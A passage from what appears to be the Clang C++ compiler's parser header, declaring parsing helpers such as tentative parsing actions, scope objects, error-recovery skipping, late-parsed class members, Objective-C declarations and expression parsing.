bool TryAltiVecVectorTokenOutOfLine();
bool TryAltiVecTokenOutOfLine(DeclSpec &DS, SourceLocation Loc,
const char *&PrevSpec, unsigned &DiagID,
bool &isInvalid);
/// Returns true if the current token is the identifier 'instancetype'.
///
/// Should only be used in Objective-C language modes.
bool isObjCInstancetype() {
assert(getLangOpts().ObjC1);
if (Tok.isAnnotation())
return false;
if (!Ident_instancetype)
Ident_instancetype = PP.getIdentifierInfo("instancetype");
return Tok.getIdentifierInfo() == Ident_instancetype;
}
/// TryKeywordIdentFallback - For compatibility with system headers using
/// keywords as identifiers, attempt to convert the current token to an
/// identifier and optionally disable the keyword for the remainder of the
/// translation unit. This returns false if the token was not replaced,
/// otherwise emits a diagnostic and returns true.
bool TryKeywordIdentFallback(bool DisableKeyword);
/// \brief Get the TemplateIdAnnotation from the token.
TemplateIdAnnotation *takeTemplateIdAnnotation(const Token &tok);
/// TentativeParsingAction - An object that is used as a kind of "tentative
/// parsing transaction". It gets instantiated to mark the token position and
/// after the token consumption is done, Commit() or Revert() is called to
/// either "commit the consumed tokens" or revert to the previously marked
/// token position. Example:
///
/// TentativeParsingAction TPA(*this);
/// ConsumeToken();
/// ....
/// TPA.Revert();
///
class TentativeParsingAction {
Parser &P;
Token PrevTok;
size_t PrevTentativelyDeclaredIdentifierCount;
unsigned short PrevParenCount, PrevBracketCount, PrevBraceCount;
bool isActive;
public:
explicit TentativeParsingAction(Parser& p) : P(p) {
PrevTok = P.Tok;
PrevTentativelyDeclaredIdentifierCount =
P.TentativelyDeclaredIdentifiers.size();
PrevParenCount = P.ParenCount;
PrevBracketCount = P.BracketCount;
PrevBraceCount = P.BraceCount;
P.PP.EnableBacktrackAtThisPos();
isActive = true;
}
void Commit() {
assert(isActive && "Parsing action was finished!");
P.TentativelyDeclaredIdentifiers.resize(
PrevTentativelyDeclaredIdentifierCount);
P.PP.CommitBacktrackedTokens();
isActive = false;
}
void Revert() {
assert(isActive && "Parsing action was finished!");
P.PP.Backtrack();
P.Tok = PrevTok;
P.TentativelyDeclaredIdentifiers.resize(
PrevTentativelyDeclaredIdentifierCount);
P.ParenCount = PrevParenCount;
P.BracketCount = PrevBracketCount;
P.BraceCount = PrevBraceCount;
isActive = false;
}
~TentativeParsingAction() {
assert(!isActive && "Forgot to call Commit or Revert!");
}
};
/// A TentativeParsingAction that automatically reverts in its destructor.
/// Useful for disambiguation parses that will always be reverted.
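///
/// A minimal usage sketch (illustrative only):
///
///   {
///     RevertingTentativeParsingAction PA(*this);
///     ConsumeToken();
///     // ... inspect the following tokens ...
///   } // PA's destructor calls Revert() here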
class RevertingTentativeParsingAction
: private Parser::TentativeParsingAction {
public:
RevertingTentativeParsingAction(Parser &P)
: Parser::TentativeParsingAction(P) {}
~RevertingTentativeParsingAction() { Revert(); }
};
class UnannotatedTentativeParsingAction;
/// ObjCDeclContextSwitch - An object used to switch context from
/// an Objective-C decl context to its enclosing decl context and
/// back.
class ObjCDeclContextSwitch {
Parser &P;
Decl *DC;
SaveAndRestore<bool> WithinObjCContainer;
public:
explicit ObjCDeclContextSwitch(Parser &p)
: P(p), DC(p.getObjCDeclContext()),
WithinObjCContainer(P.ParsingInObjCContainer, DC != nullptr) {
if (DC)
P.Actions.ActOnObjCTemporaryExitContainerContext(cast<DeclContext>(DC));
}
~ObjCDeclContextSwitch() {
if (DC)
P.Actions.ActOnObjCReenterContainerContext(cast<DeclContext>(DC));
}
};
/// ExpectAndConsume - The parser expects that 'ExpectedTok' is next in the
/// input. If so, it is consumed and false is returned.
///
/// If a trivial punctuator misspelling is encountered, a FixIt error
/// diagnostic is issued and false is returned after recovery.
///
/// If the input is malformed, this emits the specified diagnostic and true is
/// returned.
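///
/// A minimal usage sketch (the recovery strategy is illustrative):
///
///   if (ExpectAndConsume(tok::r_paren)) {
///     // diagnostic already emitted; skip to a likely recovery point
///     SkipUntil(tok::semi, StopAtSemi | StopBeforeMatch);
///   }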
bool ExpectAndConsume(tok::TokenKind ExpectedTok,
unsigned Diag = diag::err_expected,
StringRef DiagMsg = "");
/// \brief The parser expects a semicolon and, if present, will consume it.
///
/// If the next token is not a semicolon, this emits the specified diagnostic,
/// or, if there's just some closing-delimiter noise (e.g., ')' or ']') prior
/// to the semicolon, consumes that extra token.
bool ExpectAndConsumeSemi(unsigned DiagID);
/// \brief The kind of extra semi diagnostic to emit.
enum ExtraSemiKind {
OutsideFunction = 0,
InsideStruct = 1,
InstanceVariableList = 2,
AfterMemberFunctionDefinition = 3
};
/// \brief Consume any extra semi-colons until the end of the line.
void ConsumeExtraSemi(ExtraSemiKind Kind, unsigned TST = TST_unspecified);
public:
//===--------------------------------------------------------------------===//
// Scope manipulation
/// ParseScope - Introduces a new scope for parsing. The kind of
/// scope is determined by ScopeFlags. Objects of this type should
/// be created on the stack to coincide with the position where the
/// parser enters the new scope, and this object's constructor will
/// create that new scope. Similarly, once the object is destroyed
/// the parser will exit the scope.
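///
/// A hedged usage sketch (the scope flags are illustrative):
///
///   {
///     ParseScope BodyScope(this, Scope::FnScope | Scope::DeclScope);
///     // ... parse while the new scope is active ...
///   } // the scope is exited when BodyScope is destroyed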
class ParseScope {
Parser *Self;
ParseScope(const ParseScope &) = delete;
void operator=(const ParseScope &) = delete;
public:
// ParseScope - Construct a new object to manage a scope in the
// parser Self where the new Scope is created with the flags
// ScopeFlags, but only when we aren't about to enter a compound statement.
ParseScope(Parser *Self, unsigned ScopeFlags, bool EnteredScope = true,
bool BeforeCompoundStmt = false)
: Self(Self) {
if (EnteredScope && !BeforeCompoundStmt)
Self->EnterScope(ScopeFlags);
else {
if (BeforeCompoundStmt)
Self->incrementMSManglingNumber();
this->Self = nullptr;
}
}
// Exit - Exit the scope associated with this object now, rather
// than waiting until the object is destroyed.
void Exit() {
if (Self) {
Self->ExitScope();
Self = nullptr;
}
}
~ParseScope() {
Exit();
}
};
/// EnterScope - Start a new scope.
void EnterScope(unsigned ScopeFlags);
/// ExitScope - Pop a scope off the scope stack.
void ExitScope();
private:
/// \brief RAII object used to modify the scope flags for the current scope.
class ParseScopeFlags {
Scope *CurScope;
unsigned OldFlags;
ParseScopeFlags(const ParseScopeFlags &) = delete;
void operator=(const ParseScopeFlags &) = delete;
public:
ParseScopeFlags(Parser *Self, unsigned ScopeFlags, bool ManageFlags = true);
~ParseScopeFlags();
};
//===--------------------------------------------------------------------===//
// Diagnostic Emission and Error recovery.
public:
DiagnosticBuilder Diag(SourceLocation Loc, unsigned DiagID);
DiagnosticBuilder Diag(const Token &Tok, unsigned DiagID);
DiagnosticBuilder Diag(unsigned DiagID) {
return Diag(Tok, DiagID);
}
private:
void SuggestParentheses(SourceLocation Loc, unsigned DK,
SourceRange ParenRange);
void CheckNestedObjCContexts(SourceLocation AtLoc);
public:
/// \brief Control flags for SkipUntil functions.
enum SkipUntilFlags {
StopAtSemi = 1 << 0, ///< Stop skipping at semicolon
/// \brief Stop skipping at specified token, but don't skip the token itself
StopBeforeMatch = 1 << 1,
StopAtCodeCompletion = 1 << 2 ///< Stop at code completion
};
friend constexpr SkipUntilFlags operator|(SkipUntilFlags L,
SkipUntilFlags R) {
return static_cast<SkipUntilFlags>(static_cast<unsigned>(L) |
static_cast<unsigned>(R));
}
/// SkipUntil - Read tokens until we get to the specified token, then consume
/// it (unless StopBeforeMatch is specified). Because we cannot guarantee
/// that the token will ever occur, this skips to the next token, or to some
/// likely good stopping point. If Flags has StopAtSemi flag, skipping will
/// stop at a ';' character.
///
/// If SkipUntil finds the specified token, it returns true, otherwise it
/// returns false.
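///
/// For example, a hedged recovery sketch (illustrative only):
///
///   // Skip ahead to the next ')', but stop early at ';' and do not
///   // consume the ')' itself.
///   SkipUntil(tok::r_paren, StopAtSemi | StopBeforeMatch);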
bool SkipUntil(tok::TokenKind T,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
return SkipUntil(llvm::makeArrayRef(T), Flags);
}
bool SkipUntil(tok::TokenKind T1, tok::TokenKind T2,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
tok::TokenKind TokArray[] = {T1, T2};
return SkipUntil(TokArray, Flags);
}
bool SkipUntil(tok::TokenKind T1, tok::TokenKind T2, tok::TokenKind T3,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0)) {
tok::TokenKind TokArray[] = {T1, T2, T3};
return SkipUntil(TokArray, Flags);
}
bool SkipUntil(ArrayRef<tok::TokenKind> Toks,
SkipUntilFlags Flags = static_cast<SkipUntilFlags>(0));
/// SkipMalformedDecl - Read tokens until we get to some likely good stopping
/// point for skipping past a simple-declaration.
void SkipMalformedDecl();
private:
//===--------------------------------------------------------------------===//
// Lexing and parsing of C++ inline methods.
struct ParsingClass;
/// [class.mem]p1: "... the class is regarded as complete within
/// - function bodies
/// - default arguments
/// - exception-specifications (TODO: C++0x)
/// - and brace-or-equal-initializers for non-static data members
/// (including such things in nested classes)."
/// LateParsedDeclarations build the tree of those elements so they can
/// be parsed after parsing the top-level class.
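///
/// For instance, in this sketch (member names are illustrative) the body
/// of 'f' may name 'x' even though 'x' is declared later, so the body is
/// lexed now and parsed only after the class is complete:
///
///   struct S {
///     int f() { return x; }  // function body: parsed late
///     int x = 42;            // brace-or-equal-initializer: parsed late
///   };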
class LateParsedDeclaration {
public:
virtual ~LateParsedDeclaration();
virtual void ParseLexedMethodDeclarations();
virtual void ParseLexedMemberInitializers();
virtual void ParseLexedMethodDefs();
virtual void ParseLexedAttributes();
};
/// Inner node of the LateParsedDeclaration tree that parses
/// all its members recursively.
class LateParsedClass : public LateParsedDeclaration {
public:
LateParsedClass(Parser *P, ParsingClass *C);
~LateParsedClass() override;
void ParseLexedMethodDeclarations() override;
void ParseLexedMemberInitializers() override;
void ParseLexedMethodDefs() override;
void ParseLexedAttributes() override;
private:
Parser *Self;
ParsingClass *Class;
};
/// Contains the lexed tokens of an attribute with arguments that
/// may reference member variables and so need to be parsed at the
/// end of the class declaration after parsing all other member
/// declarations.
/// FIXME: Perhaps we should change the name of LateParsedDeclaration to
/// LateParsedTokens.
struct LateParsedAttribute : public LateParsedDeclaration {
Parser *Self;
CachedTokens Toks;
IdentifierInfo &AttrName;
SourceLocation AttrNameLoc;
SmallVector<Decl*, 2> Decls;
explicit LateParsedAttribute(Parser *P, IdentifierInfo &Name,
SourceLocation Loc)
: Self(P), AttrName(Name), AttrNameLoc(Loc) {}
void ParseLexedAttributes() override;
void addDecl(Decl *D) { Decls.push_back(D); }
};
// A list of late-parsed attributes. Used by ParseGNUAttributes.
class LateParsedAttrList: public SmallVector<LateParsedAttribute *, 2> {
public:
LateParsedAttrList(bool PSoon = false) : ParseSoon(PSoon) { }
bool parseSoon() { return ParseSoon; }
private:
bool ParseSoon; // Are we planning to parse these shortly after creation?
};
/// Contains the lexed tokens of a member function definition
/// which needs to be parsed at the end of the class declaration
/// after parsing all other member declarations.
struct LexedMethod : public LateParsedDeclaration {
Parser *Self;
Decl *D;
CachedTokens Toks;
/// \brief Whether this member function had an associated template
/// scope. When true, D is a template declaration;
/// otherwise, it is a member function declaration.
bool TemplateScope;
explicit LexedMethod(Parser* P, Decl *MD)
: Self(P), D(MD), TemplateScope(false) {}
void ParseLexedMethodDefs() override;
};
/// LateParsedDefaultArgument - Keeps track of a parameter that may
/// have a default argument that cannot be parsed yet because it
/// occurs within a member function declaration inside the class
/// (C++ [class.mem]p2).
struct LateParsedDefaultArgument {
explicit LateParsedDefaultArgument(Decl *P,
std::unique_ptr<CachedTokens> Toks = nullptr)
: Param(P), Toks(std::move(Toks)) { }
/// Param - The parameter declaration for this parameter.
Decl *Param;
/// Toks - The sequence of tokens that comprises the default
/// argument expression, not including the '=' or the terminating
/// ')' or ','. This will be NULL for parameters that have no
/// default argument.
std::unique_ptr<CachedTokens> Toks;
};
/// LateParsedMethodDeclaration - A method declaration inside a class that
/// contains at least one entity whose parsing needs to be delayed
/// until the class itself is completely-defined, such as a default
/// argument (C++ [class.mem]p2).
struct LateParsedMethodDeclaration : public LateParsedDeclaration {
explicit LateParsedMethodDeclaration(Parser *P, Decl *M)
: Self(P), Method(M), TemplateScope(false),
ExceptionSpecTokens(nullptr) {}
void ParseLexedMethodDeclarations() override;
Parser* Self;
/// Method - The method declaration.
Decl *Method;
/// \brief Whether this member function had an associated template
/// scope. When true, Method is a template declaration;
/// otherwise, it is a member function declaration.
bool TemplateScope;
/// DefaultArgs - Contains the parameters of the function and
/// their default arguments. At least one of the parameters will
/// have a default argument, but all of the parameters of the
/// method will be stored so that they can be reintroduced into
/// scope at the appropriate times.
SmallVector<LateParsedDefaultArgument, 8> DefaultArgs;
/// \brief The set of tokens that make up an exception-specification that
/// has not yet been parsed.
CachedTokens *ExceptionSpecTokens;
};
/// LateParsedMemberInitializer - An initializer for a non-static class data
/// member whose parsing must be delayed until the class is completely
/// defined (C++11 [class.mem]p2).
struct LateParsedMemberInitializer : public LateParsedDeclaration {
LateParsedMemberInitializer(Parser *P, Decl *FD)
: Self(P), Field(FD) { }
void ParseLexedMemberInitializers() override;
Parser *Self;
/// Field - The field declaration.
Decl *Field;
/// CachedTokens - The sequence of tokens that comprises the initializer,
/// including any leading '='.
CachedTokens Toks;
};
/// LateParsedDeclarationsContainer - While parsing a top-level (non-nested)
/// C++ class, method declarations that contain parts which cannot be parsed
/// until after the definition is completed (C++ [class.mem]p2) are stored
/// here, together with the cached tokens that will later be parsed to create
/// those entities. This includes the method declarations themselves and any
/// attached inline definitions.
typedef SmallVector<LateParsedDeclaration*,2> LateParsedDeclarationsContainer;
/// \brief Representation of a class that has been parsed, including
/// any member function declarations or definitions that need to be
/// parsed after the corresponding top-level class is complete.
struct ParsingClass {
ParsingClass(Decl *TagOrTemplate, bool TopLevelClass, bool IsInterface)
: TopLevelClass(TopLevelClass), TemplateScope(false),
IsInterface(IsInterface), TagOrTemplate(TagOrTemplate) { }
/// \brief Whether this is a "top-level" class, meaning that it is
/// not nested within another class.
bool TopLevelClass : 1;
/// \brief Whether this class had an associated template
/// scope. When true, TagOrTemplate is a template declaration;
/// otherwise, it is a tag declaration.
bool TemplateScope : 1;
/// \brief Whether this class is an __interface.
bool IsInterface : 1;
/// \brief The class or class template whose definition we are parsing.
Decl *TagOrTemplate;
/// LateParsedDeclarations - Method declarations, inline definitions and
/// nested classes that contain pieces whose parsing will be delayed until
/// the top-level class is fully defined.
LateParsedDeclarationsContainer LateParsedDeclarations;
};
/// \brief The stack of classes that is currently being
/// parsed. Nested and local classes will be pushed onto this stack
/// when they are parsed, and removed afterward.
std::stack<ParsingClass *> ClassStack;
ParsingClass &getCurrentClass() {
assert(!ClassStack.empty() && "No lexed method stacks!");
return *ClassStack.top();
}
/// \brief RAII object used to manage the parsing of a class definition.
class ParsingClassDefinition {
Parser &P;
bool Popped;
Sema::ParsingClassState State;
public:
ParsingClassDefinition(Parser &P, Decl *TagOrTemplate, bool TopLevelClass,
bool IsInterface)
: P(P), Popped(false),
State(P.PushParsingClass(TagOrTemplate, TopLevelClass, IsInterface)) {
}
/// \brief Pop this class off the stack.
void Pop() {
assert(!Popped && "Nested class has already been popped");
Popped = true;
P.PopParsingClass(State);
}
~ParsingClassDefinition() {
if (!Popped)
P.PopParsingClass(State);
}
};
/// \brief Contains information about any template-specific
/// information that has been parsed prior to parsing declaration
/// specifiers.
struct ParsedTemplateInfo {
ParsedTemplateInfo()
: Kind(NonTemplate), TemplateParams(nullptr), TemplateLoc() { }
ParsedTemplateInfo(TemplateParameterLists *TemplateParams,
bool isSpecialization,
bool lastParameterListWasEmpty = false)
: Kind(isSpecialization? ExplicitSpecialization : Template),
TemplateParams(TemplateParams),
LastParameterListWasEmpty(lastParameterListWasEmpty) { }
explicit ParsedTemplateInfo(SourceLocation ExternLoc,
SourceLocation TemplateLoc)
: Kind(ExplicitInstantiation), TemplateParams(nullptr),
ExternLoc(ExternLoc), TemplateLoc(TemplateLoc),
LastParameterListWasEmpty(false){ }
/// \brief The kind of template we are parsing.
enum {
/// \brief We are not parsing a template at all.
NonTemplate = 0,
/// \brief We are parsing a template declaration.
Template,
/// \brief We are parsing an explicit specialization.
ExplicitSpecialization,
/// \brief We are parsing an explicit instantiation.
ExplicitInstantiation
} Kind;
/// \brief The template parameter lists, for template declarations
/// and explicit specializations.
TemplateParameterLists *TemplateParams;
/// \brief The location of the 'extern' keyword, if any, for an explicit
/// instantiation.
SourceLocation ExternLoc;
/// \brief The location of the 'template' keyword, for an explicit
/// instantiation.
SourceLocation TemplateLoc;
/// \brief Whether the last template parameter list was empty.
bool LastParameterListWasEmpty;
SourceRange getSourceRange() const LLVM_READONLY;
};
void LexTemplateFunctionForLateParsing(CachedTokens &Toks);
void ParseLateTemplatedFuncDef(LateParsedTemplate &LPT);
static void LateTemplateParserCallback(void *P, LateParsedTemplate &LPT);
static void LateTemplateParserCleanupCallback(void *P);
Sema::ParsingClassState
PushParsingClass(Decl *TagOrTemplate, bool TopLevelClass, bool IsInterface);
void DeallocateParsedClasses(ParsingClass *Class);
void PopParsingClass(Sema::ParsingClassState);
enum CachedInitKind {
CIK_DefaultArgument,
CIK_DefaultInitializer
};
NamedDecl *ParseCXXInlineMethodDef(AccessSpecifier AS,
AttributeList *AccessAttrs,
ParsingDeclarator &D,
const ParsedTemplateInfo &TemplateInfo,
const VirtSpecifiers& VS,
SourceLocation PureSpecLoc);
void ParseCXXNonStaticMemberInitializer(Decl *VarD);
void ParseLexedAttributes(ParsingClass &Class);
void ParseLexedAttributeList(LateParsedAttrList &LAs, Decl *D,
bool EnterScope, bool OnDefinition);
void ParseLexedAttribute(LateParsedAttribute &LA,
bool EnterScope, bool OnDefinition);
void ParseLexedMethodDeclarations(ParsingClass &Class);
void ParseLexedMethodDeclaration(LateParsedMethodDeclaration &LM);
void ParseLexedMethodDefs(ParsingClass &Class);
void ParseLexedMethodDef(LexedMethod &LM);
void ParseLexedMemberInitializers(ParsingClass &Class);
void ParseLexedMemberInitializer(LateParsedMemberInitializer &MI);
void ParseLexedObjCMethodDefs(LexedMethod &LM, bool parseMethod);
bool ConsumeAndStoreFunctionPrologue(CachedTokens &Toks);
bool ConsumeAndStoreInitializer(CachedTokens &Toks, CachedInitKind CIK);
bool ConsumeAndStoreConditional(CachedTokens &Toks);
bool ConsumeAndStoreUntil(tok::TokenKind T1,
CachedTokens &Toks,
bool StopAtSemi = true,
bool ConsumeFinalToken = true) {
return ConsumeAndStoreUntil(T1, T1, Toks, StopAtSemi, ConsumeFinalToken);
}
bool ConsumeAndStoreUntil(tok::TokenKind T1, tok::TokenKind T2,
CachedTokens &Toks,
bool StopAtSemi = true,
bool ConsumeFinalToken = true);
//===--------------------------------------------------------------------===//
// C99 6.9: External Definitions.
struct ParsedAttributesWithRange : ParsedAttributes {
ParsedAttributesWithRange(AttributeFactory &factory)
: ParsedAttributes(factory) {}
void clear() {
ParsedAttributes::clear();
Range = SourceRange();
}
SourceRange Range;
};
DeclGroupPtrTy ParseExternalDeclaration(ParsedAttributesWithRange &attrs,
ParsingDeclSpec *DS = nullptr);
bool isDeclarationAfterDeclarator();
bool isStartOfFunctionDefinition(const ParsingDeclarator &Declarator);
DeclGroupPtrTy ParseDeclarationOrFunctionDefinition(
ParsedAttributesWithRange &attrs,
ParsingDeclSpec *DS = nullptr,
AccessSpecifier AS = AS_none);
DeclGroupPtrTy ParseDeclOrFunctionDefInternal(ParsedAttributesWithRange &attrs,
ParsingDeclSpec &DS,
AccessSpecifier AS);
void SkipFunctionBody();
Decl *ParseFunctionDefinition(ParsingDeclarator &D,
const ParsedTemplateInfo &TemplateInfo = ParsedTemplateInfo(),
LateParsedAttrList *LateParsedAttrs = nullptr);
void ParseKNRParamDeclarations(Declarator &D);
// EndLoc, if non-NULL, is filled with the location of the last token of
// the simple-asm.
ExprResult ParseSimpleAsm(SourceLocation *EndLoc = nullptr);
ExprResult ParseAsmStringLiteral();
// Objective-C External Declarations
void MaybeSkipAttributes(tok::ObjCKeywordKind Kind);
DeclGroupPtrTy ParseObjCAtDirectives();
DeclGroupPtrTy ParseObjCAtClassDeclaration(SourceLocation atLoc);
Decl *ParseObjCAtInterfaceDeclaration(SourceLocation AtLoc,
ParsedAttributes &prefixAttrs);
class ObjCTypeParamListScope;
ObjCTypeParamList *parseObjCTypeParamList();
ObjCTypeParamList *parseObjCTypeParamListOrProtocolRefs(
ObjCTypeParamListScope &Scope, SourceLocation &lAngleLoc,
SmallVectorImpl<IdentifierLocPair> &protocolIdents,
SourceLocation &rAngleLoc, bool mayBeProtocolList = true);
void HelperActionsForIvarDeclarations(Decl *interfaceDecl, SourceLocation atLoc,
BalancedDelimiterTracker &T,
SmallVectorImpl<Decl *> &AllIvarDecls,
bool RBraceMissing);
void ParseObjCClassInstanceVariables(Decl *interfaceDecl,
tok::ObjCKeywordKind visibility,
SourceLocation atLoc);
bool ParseObjCProtocolReferences(SmallVectorImpl<Decl *> &P,
SmallVectorImpl<SourceLocation> &PLocs,
bool WarnOnDeclarations,
bool ForObjCContainer,
SourceLocation &LAngleLoc,
SourceLocation &EndProtoLoc,
bool consumeLastToken);
/// Parse the first angle-bracket-delimited clause for an
/// Objective-C object or object pointer type, which may be either
/// type arguments or protocol qualifiers.
void parseObjCTypeArgsOrProtocolQualifiers(
ParsedType baseType,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SmallVectorImpl<SourceLocation> &protocolLocs,
SourceLocation &protocolRAngleLoc,
bool consumeLastToken,
bool warnOnIncompleteProtocols);
/// Parse either Objective-C type arguments or protocol qualifiers; if the
/// former, also parse protocol qualifiers afterward.
void parseObjCTypeArgsAndProtocolQualifiers(
ParsedType baseType,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SmallVectorImpl<SourceLocation> &protocolLocs,
SourceLocation &protocolRAngleLoc,
bool consumeLastToken);
/// Parse a protocol qualifier type such as '<NSCopying>', which is
/// an anachronistic way of writing 'id<NSCopying>'.
TypeResult parseObjCProtocolQualifierType(SourceLocation &rAngleLoc);
/// Parse Objective-C type arguments and protocol qualifiers, extending the
/// current type with the parsed result.
TypeResult parseObjCTypeArgsAndProtocolQualifiers(SourceLocation loc,
ParsedType type,
bool consumeLastToken,
SourceLocation &endLoc);
void ParseObjCInterfaceDeclList(tok::ObjCKeywordKind contextKey,
Decl *CDecl);
DeclGroupPtrTy ParseObjCAtProtocolDeclaration(SourceLocation atLoc,
ParsedAttributes &prefixAttrs);
struct ObjCImplParsingDataRAII {
Parser &P;
Decl *Dcl;
bool HasCFunction;
typedef SmallVector<LexedMethod*, 8> LateParsedObjCMethodContainer;
LateParsedObjCMethodContainer LateParsedObjCMethods;
ObjCImplParsingDataRAII(Parser &parser, Decl *D)
: P(parser), Dcl(D), HasCFunction(false) {
P.CurParsedObjCImpl = this;
Finished = false;
}
~ObjCImplParsingDataRAII();
void finish(SourceRange AtEnd);
bool isFinished() const { return Finished; }
private:
bool Finished;
};
ObjCImplParsingDataRAII *CurParsedObjCImpl;
void StashAwayMethodOrFunctionBodyTokens(Decl *MDecl);
DeclGroupPtrTy ParseObjCAtImplementationDeclaration(SourceLocation AtLoc);
DeclGroupPtrTy ParseObjCAtEndDeclaration(SourceRange atEnd);
Decl *ParseObjCAtAliasDeclaration(SourceLocation atLoc);
Decl *ParseObjCPropertySynthesize(SourceLocation atLoc);
Decl *ParseObjCPropertyDynamic(SourceLocation atLoc);
IdentifierInfo *ParseObjCSelectorPiece(SourceLocation &MethodLocation);
// Definitions for Objective-C context-sensitive keyword recognition.
enum ObjCTypeQual {
objc_in=0, objc_out, objc_inout, objc_oneway, objc_bycopy, objc_byref,
objc_nonnull, objc_nullable, objc_null_unspecified,
objc_NumQuals
};
IdentifierInfo *ObjCTypeQuals[objc_NumQuals];
bool isTokIdentifier_in() const;
ParsedType ParseObjCTypeName(ObjCDeclSpec &DS, Declarator::TheContext Ctx,
ParsedAttributes *ParamAttrs);
void ParseObjCMethodRequirement();
Decl *ParseObjCMethodPrototype(
tok::ObjCKeywordKind MethodImplKind = tok::objc_not_keyword,
bool MethodDefinition = true);
Decl *ParseObjCMethodDecl(SourceLocation mLoc, tok::TokenKind mType,
tok::ObjCKeywordKind MethodImplKind = tok::objc_not_keyword,
bool MethodDefinition=true);
void ParseObjCPropertyAttribute(ObjCDeclSpec &DS);
Decl *ParseObjCMethodDefinition();
public:
//===--------------------------------------------------------------------===//
// C99 6.5: Expressions.
/// TypeCastState - State whether an expression is or may be a type cast.
enum TypeCastState {
NotTypeCast = 0,
MaybeTypeCast,
IsTypeCast
};
ExprResult ParseExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseConstantExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseConstraintExpression();
// An expression that doesn't include commas (no top-level comma operator).
ExprResult ParseAssignmentExpression(TypeCastState isTypeCast = NotTypeCast);
ExprResult ParseMSAsmIdentifier(llvm::SmallVectorImpl<Token> &LineToks,
unsigned &NumLineToksConsumed,
void *Info,
bool IsUnevaluated);
private:
ExprResult ParseExpressionWithLeadingAt(SourceLocation AtLoc);
ExprResult ParseExpressionWithLeadingExtension(SourceLocation ExtLoc);
ExprResult ParseRHSOfBinaryExpression(ExprResult LHS,
prec::Level MinPrec);
ExprResult ParseCastExpression(bool isUnaryExpression,
bool isAddressOfOperand,
bool &NotCastExpr,
TypeCastState isTypeCast);
ExprResult ParseCastExpression(bool isUnaryExpression,
bool isAddressOfOperand = false,
TypeCastState isTypeCast = NotTypeCast);
/// Returns true if the next token cannot start an expression.
bool isNotExpressionStart();
/// Returns true if the next token would start a postfix-expression
/// suffix.
bool isPostfixExpressionSuffixStart() {
tok::TokenKind K = Tok.getKind();
return (K == tok::l_square || K == tok::l_paren ||
K == tok::period || K == tok::arrow ||
K == tok::plusplus || K == tok::minusminus);
}
ExprResult ParsePostfixExpressionSuffix(ExprResult LHS);
ExprResult ParseUnaryExprOrTypeTraitExpression();
ExprResult ParseBuiltinPrimaryExpression();
ExprResult ParseExprAfterUnaryExprOrTypeTrait(const Token &OpTok,
bool &isCastExpr,
ParsedType &CastTy,
SourceRange &CastRange);
typedef SmallVector<Expr*, 20> ExprListTy;
typedef SmallVector<SourceLocation, 20> CommaLocsTy;
/// ParseExpressionList - Used for C/C++ (argument-)expression-list.
bool ParseExpressionList(SmallVectorImpl<Expr *> &Exprs,
SmallVectorImpl<SourceLocation> &CommaLocs,
std::function<void()> Completer = nullptr);
/// ParseSimpleExpressionList - A simple comma-separated list of expressions,
/// used for misc language extensions.
bool ParseSimpleExpressionList(SmallVectorImpl<Expr*> &Exprs,
SmallVectorImpl<SourceLocation> &CommaLocs);
/// ParenParseOption - Control what ParseParenExpression will parse.
enum ParenParseOption {
SimpleExpr, // Only parse '(' expression ')'
CompoundStmt, // Also allow '(' compound-statement ')'
CompoundLiteral, // Also allow '(' type-name ')' '{' ... '}'
CastExpr // Also allow '(' type-name ')' <anything>
};
ExprResult ParseParenExpression(ParenParseOption &ExprType,
bool stopIfCastExpr,
bool isTypeCast,
ParsedType &CastTy,
SourceLocation &RParenLoc);
ExprResult ParseCXXAmbiguousParenExpression(
ParenParseOption &ExprType, ParsedType &CastTy,
BalancedDelimiterTracker &Tracker, ColonProtectionRAIIObject &ColonProt);
ExprResult ParseCompoundLiteralExpression(ParsedType Ty,
SourceLocation LParenLoc,
SourceLocation RParenLoc);
ExprResult ParseStringLiteralExpression(bool AllowUserDefinedLiteral = false);
ExprResult ParseGenericSelectionExpression();
ExprResult ParseObjCBoolLiteral();
ExprResult ParseFoldExpression(ExprResult LHS, BalancedDelimiterTracker &T);
//===--------------------------------------------------------------------===//
// C++ Expressions
ExprResult tryParseCXXIdExpression(CXXScopeSpec &SS, bool isAddressOfOperand,
Token &Replacement);
ExprResult ParseCXXIdExpression(bool isAddressOfOperand = false);
bool areTokensAdjacent(const Token &A, const Token &B);
void CheckForTemplateAndDigraph(Token &Next, ParsedType ObjectTypePtr,
bool EnteringContext, IdentifierInfo &II,
CXXScopeSpec &SS);
bool ParseOptionalCXXScopeSpecifier(CXXScopeSpec &SS,
ParsedType ObjectType,
bool EnteringContext,
bool *MayBePseudoDestructor = nullptr,
bool IsTypename = false,
IdentifierInfo **LastII = nullptr);
//===--------------------------------------------------------------------===//
// C++0x 5.1.2: Lambda expressions
// [...] () -> type {...}
ExprResult ParseLambdaExpression();
ExprResult TryParseLambdaExpression();
Optional<unsigned> ParseLambdaIntroducer(LambdaIntroducer &Intro,
bool *SkippedInits = nullptr);
bool TryParseLambdaIntroducer(LambdaIntroducer &Intro);
ExprResult ParseLambdaExpressionAfterIntroducer(
LambdaIntroducer &Intro);
//===--------------------------------------------------------------------===//
// C++ 5.2p1: C++ Casts
ExprResult ParseCXXCasts();
//===--------------------------------------------------------------------===//
// C++ 5.2p1: C++ Type Identification
ExprResult ParseCXXTypeid();
//===--------------------------------------------------------------------===//
// C++ : Microsoft __uuidof Expression
ExprResult ParseCXXUuidof();
//===--------------------------------------------------------------------===//
// C++ 5.2.4: C++ Pseudo-Destructor Expressions
ExprResult ParseCXXPseudoDestructor(Expr *Base, SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
ParsedType ObjectType);
//===--------------------------------------------------------------------===//
// C++ 9.3.2: C++ 'this' pointer
ExprResult ParseCXXThis();
//===--------------------------------------------------------------------===//
// C++ 15: C++ Throw Expression
ExprResult ParseThrowExpression();
ExceptionSpecificationType tryParseExceptionSpecification(
bool Delayed,
